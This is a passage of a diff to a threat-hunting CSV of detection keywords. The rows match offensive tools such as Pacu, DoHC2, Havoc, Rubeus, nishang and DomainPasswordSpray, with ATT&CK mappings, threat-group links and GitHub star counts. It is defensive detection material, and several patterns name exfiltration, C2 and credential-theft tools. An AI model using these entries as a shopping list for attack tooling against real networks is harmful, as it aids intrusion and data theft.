T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*docker run */pacu:latest*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*docker run */usr/src/rde1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*docker run */usr/src/rec2*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*docker run -p * spring4shell","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","4","303","229","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" "*docker run sitadel*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" -"*docker* donut *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*docker* donut *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*docker-compose logs wiresocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*DockerPwn*","offensive_tool_keyword","DockerPwn","Automation for abusing an exposed Docker TCP Socket. ","T1068 - T1528 - T1550","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AbsoZed/DockerPwn.py","1","0","N/A","N/A","3","208","30","2022-12-08T03:17:35Z","2019-11-23T22:32:49Z" -"*DocPlz-main.zip*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*DocsPLZ\DocsPLZ.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*DoEvil()*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*Do-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*DocPlz-main.zip*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*DocsPLZ\DocsPLZ.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*DoEvil()*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*Do-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Doge-Loader*xor.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*DoHC2*BeaconConnector*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2.exe*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" @@ -9494,115 +9642,115 @@ "*DoHC2Runner.exe*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2Runner.pdb*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*-Domain * -AllowDelegation *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*-Domain * -SPN *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Domain/CommandCollection*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*-Domain * -AllowDelegation *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-Domain * -SPN *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Domain/CommandCollection*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*-domain_admins.txt*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*domain_analyzer.py*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*domain_analyzer-master*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*domain_hunter-v*.jar","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*domainDumpConfig*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" -"*DomainEnumerator*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*DomainEnumerator*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*domainhunter*","offensive_tool_keyword","domainhunter","Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly. domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like Symantec Site Review (BlueCoat). IBM X-Force. and Cisco Talos. The primary tool output is a timestamped HTML table style report.","T1568 - T1596 - T1569 - T1593","N/A","N/A","N/A","Information Gathering","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" "*domainhunter.py*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" -"*Domaininfo/Domaininfo.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Domainpassspray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Domaininfo/Domaininfo.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Domainpassspray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*DomainPasswordSpray*","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1498","354","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" -"*DomainRecon*ridbrute*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*DomainRecon/ADCS*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*DomainRecon/BloodHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*DomainRecon/SilentHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*DomainRecon\ADCSServer.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*DomainRecon\DC-IPs.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*DomainRecon\ExploitableSystems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*DomainRecon\OxidBindings.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*DomainRecon\Windows_Servers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon*ridbrute*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/ADCS*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/BloodHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/SilentHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon\ADCSServer.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 